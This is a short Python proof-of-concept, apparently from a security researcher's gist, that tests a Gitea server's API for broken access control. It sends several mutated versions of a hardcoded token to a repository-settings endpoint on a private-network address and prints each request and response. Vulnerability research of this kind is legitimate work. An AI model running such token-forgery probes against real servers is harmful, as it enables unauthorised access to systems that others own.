gitea_insecure_access_control

gistfile1.txt

import requests
import json
import time

# Target 
host = "192.168.126.129"
port = 3000
base_url = f"http://{host}:{port}"

# Original token from the sample
auth_token = "c3a9402a254ac8d1cd64c9847212a410a85f3735" #valid token


headers = {
    "Accept": "application/json",
    "Authorization": auth_token
}

def print_request_response_info(response, request_description):
    print(f"\n=== {request_description} ===")
    print(f"Request URL: {response.url}")
    print(f"Request Headers: {json.dumps(dict(response.request.headers), indent=2)}")
    print(f"Response Status: {response.status_code} {response.reason}")
    print(f"Response Headers: {json.dumps(dict(response.headers), indent=2)}")
    print(f"Response Body: {response.text}")


def test_token_patterns():
    # Check if token follows common patterns
    patterns_to_test = [
        auth_token[:16] + "a"*20,  # First half preserved
        "a"*16 + auth_token[16:],  # Second half preserved
        auth_token[:-1] + "0",      # Last character changed
        auth_token[0] + "a"*39      # First character preserved
    ]

    for i, pattern in enumerate(patterns_to_test):
        test_headers = headers.copy()
        test_headers["Authorization"] = pattern
        url = f"{base_url}/api/v1/settings/repository"
        response = requests.get(url, headers=test_headers)
        print_request_response_info(response, f"Token Pattern Test #{i+1}")



if __name__ == "__main__":
    print("Starting Extended API Vulnerability Tests...")

    # Run extended tests

    test_token_patterns()


    print("\nExtended testing completed.")